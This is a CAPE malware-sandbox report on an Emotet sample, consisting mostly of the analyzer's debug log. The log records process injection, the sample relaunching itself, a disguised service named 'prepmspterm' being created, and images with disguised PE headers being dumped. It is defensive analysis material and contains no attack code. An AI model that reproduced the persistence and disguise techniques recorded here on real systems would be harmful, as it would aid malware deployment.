CAPE

Detections: Emotet


Analysis

Category: FILE
Package: exe
Started: 2019-10-10 00:57:00
Completed: 2019-10-10 01:01:13
Duration: 253 seconds

Options:
route = internet
procdump = 1

Log:
2019-10-10 01:57:01,000 [root] INFO: Date set to: 10-10-19, time set to: 00:57:01, timeout set to: 200
2019-10-10 01:57:01,030 [root] DEBUG: Starting analyzer from: C:\epyfuwi
2019-10-10 01:57:01,030 [root] DEBUG: Storing results at: C:\eFiNvgcB
2019-10-10 01:57:01,030 [root] DEBUG: Pipe server name: \\.\PIPE\rYYoJNHlMV
2019-10-10 01:57:01,030 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:57:01,030 [root] INFO: Automatically selected analysis package "exe"
2019-10-10 01:57:01,546 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:57:01,546 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:57:01,546 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:57:01,967 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-10-10 01:57:01,967 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:57:01,982 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:57:01,982 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-10-10 01:57:01,982 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-10-10 01:57:02,029 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe" with arguments "" with pid 1988
2019-10-10 01:57:02,029 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:02,029 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:02,059 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:02,059 [root] DEBUG: Loader: Injecting process 1988 (thread 1332) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:02,059 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1988
2019-10-10 01:57:04,088 [lib.api.process] INFO: Successfully resumed process with pid 1988
2019-10-10 01:57:04,088 [root] INFO: Added new process to list with pid: 1988
2019-10-10 01:57:04,134 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:04,134 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:04,213 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1988 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:04,213 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe".
2019-10-10 01:57:04,213 [root] INFO: Monitor successfully loaded in process with pid 1988.
2019-10-10 01:57:04,259 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:04,259 [root] DEBUG: set_caller_info: Adding region at 0x005B0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:04,276 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1356
2019-10-10 01:57:04,276 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:04,276 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:04,276 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:04,276 [root] DEBUG: Loader: Injecting process 1356 (thread 812) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:04,276 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1356
2019-10-10 01:57:04,290 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:57:04,290 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1356
2019-10-10 01:57:04,290 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:04,290 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:04,290 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:04,290 [root] DEBUG: Loader: Injecting process 1356 (thread 812) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,290 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:04,290 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,290 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:04,306 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,306 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1356
2019-10-10 01:57:04,306 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1988
2019-10-10 01:57:04,306 [root] DEBUG: GetHookCallerBase: thread 1332 (handle 0x0), return address 0x005BD293, allocation base 0x005B0000.
2019-10-10 01:57:04,306 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:04,306 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:04,306 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:04,306 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:04,306 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,306 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:04,306 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1356 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:04,306 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:04,306 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--400e05c0.
2019-10-10 01:57:04,306 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:04,306 [root] INFO: Added new process to list with pid: 1356
2019-10-10 01:57:04,306 [root] INFO: Monitor successfully loaded in process with pid 1356.
2019-10-10 01:57:04,338 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1988_16329093274577104102019
2019-10-10 01:57:04,354 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:04,354 [root] DEBUG: set_caller_info: Adding region at 0x004A0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:04,354 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x005B0000.
2019-10-10 01:57:04,354 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x005B0000
2019-10-10 01:57:04,354 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x005B0000.
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:04,354 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1988_19509753564577104102019
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10800.
2019-10-10 01:57:04,354 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:04,368 [root] INFO: Notified of termination of process with pid 1988.
2019-10-10 01:57:05,101 [root] INFO: Process with pid 1988 has terminated
2019-10-10 01:57:09,859 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:57:09,859 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 01:57:09,923 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:57:09,937 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:57:09,953 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:57:09,953 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:57:09,984 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:57:09,984 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:57:10,016 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:57:10,016 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:57:10,157 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-10-10 01:57:10,157 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:10,157 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:57:10,187 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:10,187 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,203 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:57:10,219 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:10,219 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:10,219 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:10,296 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:57:10,312 [root] WARNING: Unable to hook LockResource
2019-10-10 01:57:10,375 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x00000000741C0000, image base 0x00000000FF900000, stack from 0x0000000006CD2000-0x0000000006CE0000
2019-10-10 01:57:10,375 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:57:10,375 [root] INFO: Added new process to list with pid: 1632
2019-10-10 01:57:10,375 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-10-10 01:57:10,405 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:57:10,405 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:57:10,405 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,469 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 01:57:10,469 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:57:10,469 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:57:10,483 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:57:10,516 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:57:10,671 [root] INFO: Announced starting service "prepmspterm"
2019-10-10 01:57:10,671 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-10-10 01:57:10,687 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:10,687 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:57:10,687 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:10,687 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,687 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:57:10,717 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:10,733 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:10,733 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:10,733 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:57:10,750 [root] WARNING: Unable to hook LockResource
2019-10-10 01:57:10,750 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x00000000741C0000, image base 0x00000000FFA10000, stack from 0x0000000002FB6000-0x0000000002FC0000
2019-10-10 01:57:10,750 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-10-10 01:57:10,750 [root] INFO: Added new process to list with pid: 460
2019-10-10 01:57:10,750 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-10-10 01:57:10,750 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:57:10,750 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:57:10,750 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:11,779 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2344
2019-10-10 01:57:11,795 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:11,795 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:11,809 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:11,809 [root] DEBUG: Loader: Injecting process 2344 (thread 2032) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,825 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:11,825 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,825 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:11,842 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:11,857 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:11,857 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,857 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2344
2019-10-10 01:57:11,888 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2344
2019-10-10 01:57:11,888 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:11,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:11,904 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:11,904 [root] DEBUG: Loader: Injecting process 2344 (thread 2032) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,904 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:11,904 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,904 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:11,920 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,920 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2344
2019-10-10 01:57:11,950 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:11,950 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:11,966 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:11,966 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:11,966 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2344 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:11,997 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\prepmspterm.exe".
2019-10-10 01:57:11,997 [root] INFO: Added new process to list with pid: 2344
2019-10-10 01:57:11,997 [root] INFO: Monitor successfully loaded in process with pid 2344.
2019-10-10 01:57:12,029 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:12,029 [root] DEBUG: set_caller_info: Adding region at 0x003E0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:12,029 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2732
2019-10-10 01:57:12,043 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:12,043 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:12,043 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:12,043 [root] DEBUG: Loader: Injecting process 2732 (thread 2624) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,043 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:12,059 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,059 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2732
2019-10-10 01:57:12,059 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:57:12,059 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2732
2019-10-10 01:57:12,059 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:12,059 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:12,075 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:12,075 [root] DEBUG: Loader: Injecting process 2732 (thread 2624) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,075 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:12,075 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,075 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:12,075 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,091 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2732
2019-10-10 01:57:12,091 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2344
2019-10-10 01:57:12,091 [root] DEBUG: GetHookCallerBase: thread 2032 (handle 0x0), return address 0x003ED293, allocation base 0x003E0000.
2019-10-10 01:57:12,091 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x003E0000.
2019-10-10 01:57:12,091 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:12,091 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x003E0000
2019-10-10 01:57:12,091 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:12,091 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,091 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003E0000.
2019-10-10 01:57:12,091 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:12,091 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:12,107 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:12,107 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2732 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:12,107 [root] DEBUG: Commandline: C:\Windows\System32\--525413bf.
2019-10-10 01:57:12,107 [root] INFO: Added new process to list with pid: 2732
2019-10-10 01:57:12,107 [root] INFO: Monitor successfully loaded in process with pid 2732.
2019-10-10 01:57:12,107 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2344_60279556117577104102019
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10800.
2019-10-10 01:57:12,138 [root] DEBUG: set_caller_info: Adding region at 0x00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:12,138 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:12,138 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,138 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:12,154 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2344_32823336017577104102019
2019-10-10 01:57:12,154 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:12,154 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:12,154 [root] INFO: Notified of termination of process with pid 2344.
2019-10-10 01:57:12,168 [root] WARNING: Unable to open termination event for pid 2344.
2019-10-10 01:57:12,168 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1356
2019-10-10 01:57:12,168 [root] DEBUG: GetHookCallerBase: thread 812 (handle 0x0), return address 0x004AD26C, allocation base 0x004A0000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,168 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:12,184 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1356_45441180922587104102019
2019-10-10 01:57:12,184 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:12,184 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x004A0000.
2019-10-10 01:57:12,184 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x004A0000
2019-10-10 01:57:12,184 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,184 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x004A0000.
2019-10-10 01:57:12,200 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:12,200 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1356_35468613622587104102019
2019-10-10 01:57:12,200 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x12600.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x74940000.
2019-10-10 01:57:12,216 [root] INFO: Notified of termination of process with pid 1356.
2019-10-10 01:57:12,232 [root] INFO: Process with pid 1356 has terminated
2019-10-10 01:57:12,232 [root] INFO: Process with pid 2344 has terminated
2019-10-10 01:57:23,977 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\crypt32 (0x11d000 bytes).
2019-10-10 01:57:23,977 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:57:23,993 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-10-10 01:57:24,025 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:57:24,025 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-10-10 01:57:24,055 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-10-10 01:57:24,055 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:57:29,282 [root] DEBUG: DLL loaded at 0x74380000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 01:57:29,359 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-10-10 01:57:29,359 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74360000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74350000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-10-10 01:57:29,407 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:57:29,407 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
